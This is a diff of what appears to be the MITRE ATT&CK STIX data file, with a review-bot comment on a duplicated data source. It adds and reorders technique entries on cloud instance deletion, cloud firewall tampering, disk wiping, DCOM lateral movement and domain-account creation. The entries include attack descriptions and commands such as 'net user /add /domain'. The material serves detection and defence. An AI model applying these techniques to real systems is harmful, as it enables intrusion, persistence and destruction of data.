- "created": "2020-03-14T22:24:21.841Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -6985,18 +7225,10 @@
"phase_name": "impact"
}
],
- "modified": "2020-03-29T22:57:05.545Z",
+ "modified": "2020-04-22T15:19:31.682Z",
"created": "2019-04-08T17:51:41.390Z",
- "x_mitre_data_sources": [
- "Packet capture",
- "Web application firewall logs",
- "Web logs",
- "Packet capture"
- ],
- "x_mitre_detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n",
- "x_mitre_impact_type": [
- "Integrity"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7005,8 +7237,16 @@
"GCP",
"Azure"
],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n",
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Web application firewall logs",
+ "Web logs",
+ "Packet capture"
+ ]
},
{
"external_references": [
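Review bot: The Defacement object's `x_mitre_data_sources` lists `"Packet capture"` twice (first and last element of the array), and the reorder in this hunk carries the duplicate over unchanged; any consumer that counts or maps detections by data source will double-count it, so the array should read `"Packet capture", "Web application firewall logs", "Web logs"`. If this file is a verbatim snapshot of the upstream ATT&CK STIX bundle, the correction belongs upstream or in the loader (deduplicating array values on ingest) rather than in a hand edit here, otherwise the next refresh reverts it. The same pass would catch the doubled word in the Data Destruction object's `x_mitre_detection` text earlier in this diff (`parameters of of binaries`). The enclosing object starts in the previous hunk.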
@@ -7054,6 +7294,19 @@
],
"modified": "2020-03-23T21:37:34.567Z",
"created": "2020-03-13T20:15:31.974Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+ "x_mitre_data_sources": [
+ "AWS CloudTrail logs",
+ "Stackdriver logs",
+ "Authentication logs",
+ "Process monitoring"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7064,20 +7317,69 @@
"Office 365",
"Azure AD",
"SaaS"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578.003",
+ "url": "https://attack.mitre.org/techniques/T1578/003"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ },
+ {
+ "source_name": "AWS CloudTrail Search",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/",
+ "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Azure Activity Logs",
+ "url": "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs",
+ "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Cloud Audit Logs",
+ "url": "https://cloud.google.com/logging/docs/audit#admin-activity",
+ "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020."
+ }
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Delete Cloud Instance",
+ "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)",
+ "id": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-17T19:53:14.784Z",
+ "created": "2020-06-16T17:23:06.508Z",
+ "x_mitre_detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)",
"x_mitre_data_sources": [
- "AWS CloudTrail logs",
+ "GCP audit logs",
"Stackdriver logs",
- "Authentication logs",
- "Process monitoring"
+ "Azure activity logs",
+ "AWS CloudTrail logs"
],
- "x_mitre_detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
- "Administrator",
"User"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
+ ]
},
{
"object_marking_refs": [
@@ -7116,32 +7418,34 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T21:07:11.799Z",
+ "modified": "2020-07-09T14:42:23.122Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host intrusion prevention systems",
- "Signature-based detection",
- "Network intrusion detection system"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward",
+ "Red Canary"
],
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward",
- "Red Canary"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host intrusion prevention systems",
+ "Signature-based detection",
+ "Network intrusion detection system"
],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -7177,6 +7481,19 @@
],
"modified": "2020-03-29T01:10:52.360Z",
"created": "2020-03-02T20:07:18.651Z",
+ "x_mitre_data_sources": [
+ "Sensor health and status",
+ "Network protocol analysis",
+ "Netflow/Enclave netflow",
+ "Network intrusion detection system",
+ "Network device logs"
+ ],
+ "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7187,19 +7504,6 @@
"SaaS",
"Azure",
"Office 365"
- ],
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
- "x_mitre_data_sources": [
- "Sensor health and status",
- "Network protocol analysis",
- "Netflow/Enclave netflow",
- "Network intrusion detection system",
- "Network device logs"
]
},
{
@@ -7236,22 +7540,22 @@
],
"modified": "2020-01-30T22:27:39.932Z",
"created": "2017-05-31T21:30:20.934Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "API monitoring"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.",
"x_mitre_defense_bypassed": [
"File monitoring",
"File system access controls"
],
- "x_mitre_detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_data_sources": [
+ "API monitoring"
],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"external_references": [
@@ -7282,23 +7586,73 @@
],
"modified": "2020-03-29T22:02:33.870Z",
"created": "2020-02-21T20:46:36.688Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_defense_bypassed": [
+ "Log analysis"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.",
"x_mitre_data_sources": [
"Process monitoring",
"Windows event logs",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.",
- "x_mitre_defense_bypassed": [
- "Log analysis"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1562.007",
+ "url": "https://attack.mitre.org/techniques/T1562/007"
+ },
+ {
+ "source_name": "Expel IO Evil in AWS",
+ "url": "https://expel.io/blog/finding-evil-in-aws/",
+ "description": "Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020."
+ }
],
- "x_mitre_permissions_required": [
- "Administrator"
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Disable or Modify Cloud Firewall",
+ "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
+ "id": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-07-07T13:49:05.345Z",
+ "created": "2020-06-24T16:55:46.243Z",
+ "x_mitre_contributors": [
+ "Expel"
+ ],
+ "x_mitre_detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.",
+ "x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_data_sources": [
+ "Stackdriver logs",
+ "GCP audit logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs"
+ ],
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
+ ]
},
{
"external_references": [
@@ -7324,24 +7678,40 @@
],
"modified": "2020-03-29T22:18:11.166Z",
"created": "2020-02-21T21:00:48.814Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "Firewall"
],
+ "x_mitre_detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters",
"Windows Registry"
],
- "x_mitre_detection": "Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.",
- "x_mitre_defense_bypassed": [
- "Firewall"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-02-21T20:32:20.810Z",
+ "modified": "2020-03-29T21:52:43.151Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.",
+ "name": "Disable or Modify Tools",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -7354,22 +7724,6 @@
"url": "https://capec.mitre.org/data/definitions/578.html"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Disable or Modify Tools",
- "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.",
- "id": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T21:52:43.151Z",
- "created": "2020-02-21T20:32:20.810Z",
"x_mitre_platforms": [
"Windows",
"macOS",
@@ -7447,6 +7801,22 @@
"created": "2019-03-29T14:59:50.763Z"
},
{
+ "created": "2020-02-20T22:06:41.739Z",
+ "modified": "2020-03-28T22:53:20.162Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "impact"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac",
+ "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+ "name": "Disk Content Wipe",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -7474,22 +7844,6 @@
"source_name": "Microsoft Sysmon v6 May 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Disk Content Wipe",
- "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
- "id": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "impact"
- }
- ],
- "modified": "2020-03-28T22:53:20.162Z",
- "created": "2020-02-20T22:06:41.739Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7607,28 +7961,28 @@
],
"modified": "2020-03-28T23:00:00.367Z",
"created": "2020-02-20T22:10:20.484Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Kernel drivers",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
- "x_mitre_impact_type": [
- "Availability"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root",
"SYSTEM"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
+ "x_mitre_data_sources": [
+ "Kernel drivers",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -7664,37 +8018,39 @@
],
"modified": "2020-03-28T23:00:00.599Z",
"created": "2020-02-20T22:02:20.372Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Kernel drivers",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
- "x_mitre_impact_type": [
- "Availability"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"root",
"SYSTEM",
"Administrator"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
+ "x_mitre_data_sources": [
+ "Kernel drivers",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "id": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd",
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.",
- "name": "Distributed Component Object Model",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2020-02-11T18:26:36.444Z",
+ "modified": "2020-03-23T20:21:03.684Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -7747,15 +8103,13 @@
"source_name": "Cyberreason DCOM DDE Lateral Movement Nov 2017"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-23T20:21:03.684Z",
- "created": "2020-02-11T18:26:36.444Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Distributed Component Object Model",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.",
+ "id": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd",
"x_mitre_data_sources": [
"Windows event logs",
"Windows Registry",
@@ -7778,6 +8132,22 @@
]
},
{
+ "created": "2020-01-28T14:05:17.825Z",
+ "modified": "2020-03-23T18:12:36.696Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177",
+ "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
+ "name": "Domain Account",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -7790,22 +8160,6 @@
"url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Domain Account",
- "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
- "id": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- }
- ],
- "modified": "2020-03-23T18:12:36.696Z",
- "created": "2020-01-28T14:05:17.825Z",
"x_mitre_platforms": [
"Windows",
"macOS",
@@ -7853,24 +8207,52 @@
],
"modified": "2020-03-26T13:42:34.402Z",
"created": "2020-02-21T21:08:26.480Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
